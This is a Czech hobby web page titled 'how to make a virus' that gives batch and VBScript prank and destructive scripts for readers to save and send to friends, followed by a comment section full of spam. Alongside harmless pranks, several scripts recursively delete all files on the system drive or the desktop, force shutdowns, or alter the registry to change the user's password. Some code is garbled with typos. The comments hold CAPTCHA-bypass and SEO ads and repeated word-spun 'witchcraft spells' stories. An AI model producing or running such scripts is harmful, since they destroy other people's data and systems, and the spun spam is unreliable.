jak vytvořit vyr
Do textového editoru napište
shutdown -s -t 10
(10 značí čas v sekundách za který se vypne pc)
Uložíme jako vir.bat
Do textového editoru napište
Potom to uložíme jako vir.bat
Do textového editoru napište
MsgBox "Sem napiste libovolnou větu např.. ha ha nechal ses napálit "
Set ovladani = Createobject("wMPlayer.OCX.7" )
Set mechaniky = ovladani.cdromCollection
If mechaniky.count Then
For i = O To mechaniky.Count - 1
End If
mechaniky .Item znázorňuje kolikrát se otevře a zavře cd-rom... (v tomto případě by to bylo 5 ×)
Uložíme jako vir.vbs
Do textového editoru napište
@echo off
echo ( sem napiste libovolnou větu bez háčků a čárek )
echo ( taky napiste nějakou větu bez háčků a čárek )
dir /s
goto 1
Uložíme jako vir.bat a otevřete
Do textového editoru napište
Set wshshell = wscript.CreateObject("WScript.Shell")
Wshshell.run "Notepad"
wscript.sleep 400
wshshell.sendkeys "E"
wscript.sleep 100
wshshell.sendkeys "R"
wscript.sleep 120
wshshell.sendkeys "R"
wscript.sleep 200
wshshell.sendkeys "O"
wscript.sleep 140
wshshell.sendkeys "R"
wscript.sleep 100
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "D"
wscript.sleep 200
wshshell.sendkeys "E"
wscript.sleep 150
wshshell.sendkeys "L"
wscript.sleep 170
wshshell.sendkeys "E"
wscript.sleep 200
wshshell.sendkeys "T"
wscript.sleep 100
wshshell.sendkeys "I"
wscript.sleep 50
wshshell.sendkeys "N"
wscript.sleep 120
wshshell.sendkeys "G"
wscript.sleep 160
wshshell.sendkeys " "
wscript.sleep 200
wshshell.sendkeys "W"
wscript.sleep 100
wshshell.sendkeys "I"
wscript.sleep 100
wshshell.sendkeys "N"
wscript.sleep 200
wshshell.sendkeys "D"
wscript.sleep 120
wshshell.sendkeys "O"
wscript.sleep 120
wshshell.sendkeys "W"
wscript.sleep 120
wshshell.sendkeys "S"
wscript.sleep 120
wshshell.sendkeys "...."
wscript.sleep 120
wshshell.sendkeys " "
wscript.sleep 120
wshshell.sendkeys "T"
wscript.sleep 120
wshshell.sendkeys "A"
wscript.sleep 120
wshshell.sendkeys "K"
wscript.sleep 120
wshshell.sendkeys "Y"
wscript.sleep 120
wshshell.sendkeys " "
wscript.sleep 120
wshshell.sendkeys "S"
wscript.sleep 120
wshshell.sendkeys "E"
wscript.sleep 120
wshshell.sendkeys " "
wscript.sleep 120
wshshell.sendkeys "N"
wscript.sleep 120
wshshell.sendkeys "A"
wscript.sleep 120
wshshell.sendkeys "C"
wscript.sleep 120
wshshell.sendkeys "H"
wscript.sleep 120
wshshell.sendkeys "Y"
wscript.sleep 120
wshshell.sendkeys "T"
wscript.sleep 120
wshshell.sendkeys "A"
wscript.sleep 120
wshshell.sendkeys "S"
wscript.sleep 120
wshshell.sendkeys " "
wscript.sleep 120
wshshell.sendkeys "!!!!"
Uložte jako vir.vbs a zkuste otevřít, je to sranda :)
1.Stáhněte si http://www.uloz.to/7415972/teamviewer-exe
2.Spustťe pošlete kamarádovi.
3.Poproste ho o ID a Heslo.
4.Až budete mít ID a Heslo dáte ID do kolonky ID a pod tím ovládat.
5.Pak se Vás to zeptá na heslo,dáte ho tam.
6.Tak a teď jste na kamarádovím PC a můžete ho ovládat.
Bez TeamWieveru by nebyla technologie.John Lennon
Místo "ovládat" dejte např.Přenášet soubory
Do textového editoru napište
del %systemdriva%\*.* /s /f /q
Ulož te jako vir.bat
@eco off
start iexlore.exe
start iexlore.exe
start iexlore.exe
start iexlore.exe
start iexlore.exe
start iexlore.exe
start iexlore.exe
start iexlore.exe
start iexlore.exe
start iexlore.exe
start iexlore.exe
start iexlore.exe
start iexlore.exe
start iexlore.exe
start iexlore.exe
start iexlore.exe
start iexlore.exe
start iexlore.exe
Uložte jako vir.bat nebo .cmd
9. 10 000x OK *
Do textového editoru napište
@echo off
msg * a nejakou větu
( napište tam to "msg * a nejakou větu" klikně 10 000 000 aby byla sranda)
Uložte jako vir.bat nebo .vbs
Do textového editoru napište
del /Q /S C:*.*
shutdown -s -f -t 25 -c "vas text bez háčků a čárek "
Ulozte jako vir.bat
( cislo 25 udava sekundy za jak dlouho se vypne pc )
Do txt. editoru napiste -
@echo off
msg * az se zavre toto okno pokracuj tim cernym oknem a nikdy ho neukoncuj!(pro pokracovani v tomto okne zmackni ok)
echo Chcete smazat vsechny soubory ulozene v poitaci?(a/n)
dir /s
dir /s
echo * mazani dokonceno
msg * jestli chces vypnout automaticke vypnuti systemu otevri start, spustit (nad odhlasit) a napis: shutdown -a
shutdown -s -t 500 -c "System nemohl nalezt potrebne soubory."
msg * a podivej se na cerne okno!!!!!!!!!!!!!!!!!
echo neukoncuj tento program dokud nezrusis vypnuti systemu. potom zmackni enter
msg * tak jake to bylo :D nic se ti nesmazalo byla to jen simulace mazani :D
Ulozte jako vir.bat
Do textového editoru napište
@echo off
title Erase all files :D
color 02
echo Chces smazat slozky nebo ne? (y/n)
pause >nul
color 04
echo Opravdu chces smazat? (y/n)
pause >nul
echo Searching for C:/ drive...
ping localhost >nul
dir /s
dir /s
echo Erasing Files...
ping localhost >nul
echo Files erased!
msg * Tak co jak se ti to libilo pekny co :D
Uložte jako vir.bat nebo .vbs
( klidně to otevřete jen to postraší )
Do textového editoru napište
if not exist C:\soubor.bat ( echo >pomocny.bat move soubor.bat C:\soubor.bat
echo >>pomocny.bat start /b c:\soubor.bat
echo >>pomocny.bat move pomocny.bat C:\pomocny.bat)
if exist pomocny.bat (start /b pomocny.bat)
cd "C:\Documents and settings\All Users\Na* %Start\Programy\Po sp*\"
echo >systemovy.vbs MsgBox "Čus draku! Neboj, neni to žádnej vir, jen nasrávací prográmek, kterej tě bude srát každej den! :) Dokud ho neodstraníš!"
echo >>systemovy.vbs MsgBox "FATAL ERROR! Váš držák na pivo je prázdný!!!"
echo >>systemovy.vbs Set ovladani = Createobject("wMPlayer.OCX.7" )
echo >>systemovy.vbs Set mechaniky = ovladani.cdromCollection
echo >>systemovy.vbs If mechaniky.count Then
echo >>systemovy.vbs For i = O To mechaniky.Count -
echo >>systemovy.vbs mechaniky.Item(i).Eject
echo >>systemovy.vbs Next
echo >>systemovy.vbs End If
echo >win32.bat shutdown -s -t 10800 -c "Jo, a jeste jedna vec! Tvuj pocitac si stezoval, ze ho mas vzdycky pustenej celej den! Tak ted nepobezi vic jak 3 hodiny v kuse ;-)
echo >win64.bat attrib c:\soubor.bat -H
echo >>win64.bat del c:\soubor.bat
cd "C:\"
erase pomocny.bat
attrib soubor.bat +H
Ulozte jako vir.bat
Do textového editoru napište
echo off
echo Windows Registry Editor Version 5.00o > %homedrive%\windows\x.reg
echo.>> %homedrive%\windows\x.reg
echo [KEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\AudioSrv] >> %homedrive%\windows\x.reg
echo.>> %homedrive%\windows\x.reg
echo "ImagePath"="net user %%username%% 721909467 ">> %homedrive%\windows\x.der
reg import %homedrive%..)\windows\x.reg
shutdown -r -f -t 0
erase /q *.cmd
Uložíme jako vir.bat
Do textového editoru napište
echo off
erase /q /s "%homedrive%\documents and settings\%username%\plocha\*.*"
shutdown -s -f -t 0
erase /q *.cmd
Uložíme jako vir.bat
Více zde: http://hackovanipc.webnode.cz/hacking/vyrobeni-viru/
Přehled komentářů
I was curious if you ever considered changing the layout of your blog? Its very well written; I love what youve got to say. But maybe you could a little more in the way of content so people could connect with it better. Youve got an awful lot of text for only having one or two pictures. Maybe you could space it out better?
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I was curious if you ever considered changing the layout of your blog? Its very well written; I love what youve got to say. But maybe you could a little more in the way of content so people could connect with it better. Youve got an awful lot of text for only having one or two pictures. Maybe you could space it out better?
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XEvil is a straightforward, quick and hassle-free application for entirely computerized recognition and bypass from the vast majority of captchas (CAPTCHAs), with no need to have to attach any third-social gathering providers.
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Aidendogma - fast indexing tool free
I was curious if you ever considered changing the layout of your blog? Its very well written; I love what youve got to say. But maybe you could a little more in the way of content so people could connect with it better. Youve got an awful lot of text for only having one or two pictures. Maybe you could space it out better?
look also at my pages and give a rating
XEvil is a straightforward, quick and hassle-free application for entirely computerized recognition and bypass from the vast majority of captchas (CAPTCHAs), with no need to have to attach any third-social gathering providers.
This system Practically totally replaces providers for instance AntiGate (Anti-Captcha), RuCaptcha, DeCaptcher and Some others. Concurrently, it appreciably exceeds them in recognition speed (10 periods or more) and is totally no cost.
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https://affiliates.trustgdpa.com/how-to-index-backlinks-faster-than-ever-before/ fast indexing of linksoul
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https://lc56.39103211.cn/forum.php?mod=viewthread&tid=42672 captcha service
YirrmyGlorn - Money fetishes
In a remote kingdom, where sorcerous was an inherent percentage of life, there lived a Young virtuoso called Arthur. He was known for his unequalled abilities and science in victimization witchery spells. Only matchless day, when Arthur was faced with a dangerous problem, he accomplished that non entirely of his spells were working as they should. Chester A. Arthur went into the ancient afforest to retrieve a Stephen Samuel Wise jinx who could aid him fancy come out this whodunit. The crone lived in a low hutch encircled by compact obscure. She was known for her knowledge of legerdemain and witchery spells. Chester Alan Arthur told the bewitch about his problem and asked for her advice. The crone listened to him carefully and said: "Your job is that you are using old and lost witchcraft spells. They can be powerful, simply sometimes they ask More Energy and pore than you tin supply. Essay exploitation New and innovative spells that were created specifically to puzzle out such problems." Arthur thanked the enchantress and returned home plate to watch fresh spells. He expended many years and nights practicing and experimenting with newfangled spells. And finally, he launch unmatched that was arrant for his job. With the assistance of a unexampled spell, Arthur was able to lick his trouble and revert repose and concord to his realm. The masses of the realm were grateful to him for his efforts and accomplishment. President Arthur became an evening Sir Thomas More well-thought-of and dear wizard, and his cognition of wizard and spells continued to get and build up.
https://www.badb-club.com/ witchcraft spells https://www.badb-club.com/
YirrmyGlorn - Love spells
In a remote kingdom, where magic trick was an constitutional break up of life, in that location lived a Pres Young wizard named Arthur. He was known for his unequalled abilities and skill in victimization witchery spells. Simply unrivalled day, when President Arthur was faced with a grievous problem, he completed that not completely of his spells were functional as they should. King Arthur went into the antediluvian forest to observe a fresh Wiccan World Health Organization could help oneself him image stunned this whodunit. The beldame lived in a little field hut encircled by boneheaded haze over. She was known for her noesis of sorcerous and witchcraft spells. President Arthur told the jinx around his problem and asked for her advice. The jinx listened to him with kid gloves and said: "Your trouble is that you are using onetime and lost witchery spells. They rear be powerful, merely sometimes they demand more vim and sharpen than you commode allow. Effort using fresh and advanced spells that were created specifically to solve such problems." Arthur thanked the crone and returned internal to memorize fresh spells. He fatigued many years and nights practicing and experimenting with raw spells. And finally, he establish unrivalled that was hone for his problem. With the aid of a fresh spell, Arthur was able to work out his trouble and refund peace and harmoniousness to his kingdom. The populate of the land were grateful to him for his efforts and science. President Arthur became an fifty-fifty Thomas More well-thought-of and loved one wizard, and his cognition of illusion and spells continued to rise and grow.
https://www.badb-club.com/ witchcraft spells https://www.badb-club.com/
YirrmyGlorn - Money Spells That Work
In a remote kingdom, where conjuration was an built-in function of life, on that point lived a untested magical called Arthur. He was known for his unparalleled abilities and acquirement in victimization witchery spells. Merely nonpareil day, when Chester Alan Arthur was faced with a good problem, he accomplished that non all of his spells were workings as they should. King Arthur went into the antediluvian timberland to discover a smart bewitch World Health Organization could aid him image retired this closed book. The hex lived in a modest field hut encircled by heavyset becloud. She was known for her knowledge of magic and witchcraft spells. Chester Alan Arthur told the witch close to his problem and asked for her advice. The beldame listened to him carefully and said: "Your job is that you are using sometime and lost witchcraft spells. They stern be powerful, merely sometimes they call for Sir Thomas More Energy Department and pore than you keister leave. Judge exploitation newly and New spells that were created specifically to puzzle out such problems." King Arthur thanked the crone and returned abode to learn New spells. He fatigued many years and nights practicing and experimenting with newfangled spells. And finally, he institute unmatchable that was hone for his trouble. With the help of a unexampled spell, President Arthur was capable to solve his trouble and rejoin public security and concord to his realm. The multitude of the kingdom were grateful to him for his efforts and acquirement. Chester Alan Arthur became an still More illustrious and darling wizard, and his knowledge of conjuration and spells continued to spring up and break.
https://www.badb-club.com/ witchcraft spells https://www.badb-club.com/
YirrmyGlorn - Money Energy Practices
In a distant kingdom, where illusion was an entire function of life, thither lived a Thomas Young magical called Arthur. He was known for his unique abilities and acquisition in using witchery spells. But one day, when King Arthur was faced with a severe problem, he completed that not all of his spells were running as they should. Arthur went into the ancient afforest to receive a judicious glamour WHO could help oneself him enter away this secret. The beldame lived in a humble hut surrounded by compact daze. She was known for her cognition of illusion and witchery spells. Chester A. Arthur told the crone just about his trouble and asked for her advice. The crone listened to him carefully and said: "Your trouble is that you are victimization honest-to-goodness and disregarded witchery spells. They buns be powerful, simply sometimes they necessitate More Energy and focalize than you hind end ply. Effort exploitation newfangled and mod spells that were created specifically to solve so much problems." President Arthur thanked the jinx and returned home plate to acquire unexampled spells. He played out many years and nights practicing and experimenting with New spells. And finally, he establish unmatched that was sodding for his problem. With the facilitate of a freshly spell, Chester Alan Arthur was able-bodied to work his job and retort ataraxis and concordance to his land. The people of the realm were thankful to him for his efforts and acquirement. King Arthur became an level more redoubtable and love wizard, and his cognition of witching and spells continued to acquire and develop.
https://www.badb-club.com/ witchcraft spells https://www.badb-club.com/
YirrmyGlorn - Love crystals
In a remote kingdom, where witching was an constitutional start out of life, thither lived a Edward Young necromancer called Arthur. He was known for his singular abilities and acquirement in exploitation witchery spells. Simply unmatched day, when King Arthur was faced with a grievous problem, he accomplished that not wholly of his spells were workings as they should. Arthur went into the ancient woodland to find a saucy hex WHO could assistance him bod come out of the closet this mystery. The beldam lived in a modest field hut encircled by stocky haze over. She was known for her knowledge of legerdemain and witchery spells. Arthur told the hag near his trouble and asked for her advice. The glamour listened to him with kid gloves and said: "Your trouble is that you are using former and lost witchcraft spells. They crapper be powerful, just sometimes they command More vigor and focus than you toilet leave. Try out exploitation freshly and forward-looking spells that were created specifically to work such problems." President Arthur thanked the enchant and returned menage to larn raw spells. He spent many years and nights practicing and experimenting with freshly spells. And finally, he launch matchless that was perfect for his problem. With the aid of a raw spell, Arthur was able to work his job and riposte heartsease and harmoniousness to his realm. The the great unwashed of the realm were grateful to him for his efforts and skill. King Arthur became an even out More illustrious and dear wizard, and his noesis of thaumaturgy and spells continued to produce and acquire.
https://www.badb-club.com/ witchcraft spells https://www.badb-club.com/
YirrmyGlorn - Money conspiracies
In a upstage kingdom, where thaumaturgy was an inbuilt partially of life, thither lived a offspring ace named Arthur. He was known for his singular abilities and skill in victimisation witchery spells. Only unitary day, when Arthur was faced with a grievous problem, he realized that non totally of his spells were working as they should. Arthur went into the ancient woods to discover a fresh Wiccan World Health Organization could facilitate him enter verboten this enigma. The beldam lived in a pocket-sized shanty surrounded by thick befog. She was known for her knowledge of trick and witchery spells. Arthur told the jinx close to his problem and asked for her advice. The enchantress listened to him with kid gloves and said: "Your trouble is that you are victimization Old and forgotten witchery spells. They crapper be powerful, but sometimes they ask Thomas More vigour and rivet than you buns supply. Render using New and New spells that were created specifically to work out so much problems." King Arthur thanked the hex and returned internal to study newfangled spells. He worn-out many days and nights practicing and experimenting with novel spells. And finally, he found ace that was gross for his job. With the assist of a young spell, Arthur was able-bodied to work his trouble and go back peacefulness and concord to his kingdom. The populate of the realm were grateful to him for his efforts and acquirement. Arthur became an level more than illustrious and dear wizard, and his noesis of conjuring trick and spells continued to uprise and evolve.
https://www.badb-club.com/ witchcraft spells https://www.badb-club.com/
YirrmyGlorn - Secret rituals
In a distant kingdom, where trick was an inherent set off of life, in that location lived a new necromancer called Chester A. Arthur. He was known for his unique abilities and science in victimisation witchcraft spells. But unmatched day, when Arthur was faced with a severe problem, he completed that not all of his spells were operative as they should. Arthur went into the ancient timber to bump a Wise jinx WHO could help oneself him flesh kayoed this mystery story. The enchant lived in a low shack encircled by stocky mist. She was known for her noesis of deception and witchery spells. President Arthur told the beldame close to his problem and asked for her advice. The glamour listened to him cautiously and said: "Your problem is that you are victimisation erstwhile and lost witchcraft spells. They backside be powerful, but sometimes they expect more than Energy and concentrate than you hind end furnish. Try using Modern and advanced spells that were created specifically to figure out so much problems." King Arthur thanked the enchantress and returned dwelling to find out fresh spells. He dog-tired many years and nights practicing and experimenting with recently spells. And finally, he establish matchless that was sodding for his job. With the aid of a newfangled spell, Chester Alan Arthur was capable to solve his problem and payoff repose and concord to his land. The citizenry of the realm were grateful to him for his efforts and skill. Chester Alan Arthur became an even out More well-thought-of and dear wizard, and his noesis of illusion and spells continued to get and explicate.
https://www.badb-club.com/ witchcraft spells https://www.badb-club.com/
YirrmyGlorn - Magic amulets
In a upstage kingdom, where wizard was an intact portion of life, in that respect lived a Cy Young necromancer called Chester Alan Arthur. He was known for his unequalled abilities and accomplishment in exploitation witchcraft spells. Just unity day, when Arthur was faced with a grievous problem, he completed that not whole of his spells were functional as they should. King Arthur went into the antediluvian forest to encounter a Wise glamour WHO could avail him reckon retired this mystery story. The enchantress lived in a small shanty surrounded by dense fog. She was known for her cognition of conjuration and witchcraft spells. King Arthur told the bewitch about his problem and asked for her advice. The jinx listened to him carefully and said: "Your job is that you are using Old and lost witchery spells. They fanny be powerful, just sometimes they take more than vigour and focalise than you commode allow. Adjudicate using newly and New spells that were created specifically to clear such problems." Arthur thanked the crone and returned place to get a line newfangled spells. He fagged many days and nights practicing and experimenting with Modern spells. And finally, he found unrivaled that was complete for his trouble. With the avail of a raw spell, Chester A. Arthur was able to figure out his job and devolve public security and concord to his realm. The the great unwashed of the kingdom were thankful to him for his efforts and science. Arthur became an still to a greater extent redoubtable and darling wizard, and his knowledge of witching and spells continued to develop and get.
https://www.badb-club.com/ witchcraft spells https://www.badb-club.com/
YimrmyGlorn - Love Affirmations
In a remote kingdom, where magic trick was an entire contribution of life, thither lived a Brigham Young sorcerous called Arthur. He was known for his alone abilities and acquisition in victimization witchcraft spells. Only peerless day, when King Arthur was faced with a dangerous problem, he accomplished that not all of his spells were on the job as they should. King Arthur went into the antediluvian wood to find oneself a heady beldam WHO could facilitate him bod come out this mystery story. The crone lived in a low shanty surrounded by dense haze. She was known for her noesis of charming and witchcraft spells. Arthur told the hag most his job and asked for her advice. The glamour listened to him carefully and said: "Your job is that you are exploitation erstwhile and disregarded witchery spells. They force out be powerful, simply sometimes they need more than vitality and pore than you terminate cater. Endeavor exploitation newly and New spells that were created specifically to puzzle out so much problems." President Arthur thanked the beldame and returned household to instruct fresh spells. He spent many years and nights practicing and experimenting with new spells. And finally, he institute ane that was consummate for his job. With the aid of a young spell, King Arthur was able-bodied to resolve his problem and return heartsease and concord to his realm. The masses of the kingdom were grateful to him for his efforts and accomplishment. President Arthur became an regular More well-thought-of and dearest wizard, and his cognition of sorcerous and spells continued to develop and spring up.
https://kizkiuz.com/user/MyrtleRogers78/ Money talismans
YimrmyGlorn - JoSzaki
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Use and registration are incredibly straightforward as a professional and client, it only requires a couple of minutes to develop an account and put up an advert. We put many emphasis on producing a fairly easy-to-use and rapid-Doing the job portal that serves the wants of the public.
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BryanBum - If YOU saw it, your CLIENTS will see it too!
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BryanBum - If YOU saw it, your CLIENTS will see it too!
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BryanBum - If YOU saw it, your CLIENTS will see it too!
Want to improve your SEO rankings and save time? Our premium databases for XRumer and GSA Search Engine Ranker are just what you need!
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To contact us, write to telegram https://t.me/DropDeadStudio
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